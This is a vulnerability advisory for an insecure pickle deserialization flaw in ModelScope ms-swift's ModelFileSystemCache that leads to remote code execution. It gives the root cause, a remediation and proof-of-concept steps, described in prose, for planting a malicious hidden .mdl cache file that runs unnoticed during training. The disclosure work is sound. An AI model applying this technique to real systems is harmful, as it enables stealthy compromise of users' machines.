### Key Information Summary #### 1. Vulnerability Overview and Impact - **Vulnerability Type**: ModelScope Ms-Swift ModelFileSystemCache deserialization of untrusted data leading to remote code execution (RCE) vulnerability. - **Affected Versions**: ModelScope/ms-swift library versions 2.6.1 and earlier. - **Attack Method**: Attackers craft malicious `.mdl` files and exploit the `pickle.load()` function to deserialize untrusted data, thereby executing arbitrary code and commands. - **Stealthiness**: The payload file is a hidden file, making it difficult for victims to detect. During model training, even if malicious code is loaded and executed, the normal training process remains unaffected, and users may not notice any anomalies. #### 2. Affected Product - **Product**: ModelScope ms-swift - **Module**: ModelFileSystemCache - **File**: `swift/hub/utils/caching.py` - **Version**: <=2.6.1 - **GitHub Link**: [ModelScope ms-swift](https://github.com/modelscope/ms-swift/blob/ab38bff0387a86fd9f068246c526ee7b0d5ed139/swift/hub/utils/caching.py#L141) #### 3. Root Cause Analysis - **Cause**: The vulnerability arises from insecure deserialization of untrusted data, specifically using `pickle.load()` to load hidden cache files, which leads to code execution. - **Injection Point**: The vulnerability occurs at the point where `pickle.load()` is called; exact location is referenced in the GitHub link. - **Remediation Recommendation**: When handling configuration files, it is recommended to use safer parsing methods such as `yaml.safe_load(yaml_file)` or `json.load()` to reduce the risk of arbitrary code execution. #### 4. PoC (Proof of Concept) - **Steps**: 1. Run `exploit.py` to generate a malicious cache file `.mdl`, which will create a directory on the victim’s system. 2. Replace the original `.mdl` file in the model directory with the generated malicious `.mdl` file. 3. During training, when specifying the `model_id_or_path` parameter to reference a local model directory, if the `.mdl` file in the path has been tampered with, it will trigger remote code execution (RCE). This modification does not interrupt the normal training process, making the RCE attack stealthy and hard to detect. #### Authors - Hao Fan (凡浩) and Yu Rong (戎蓉)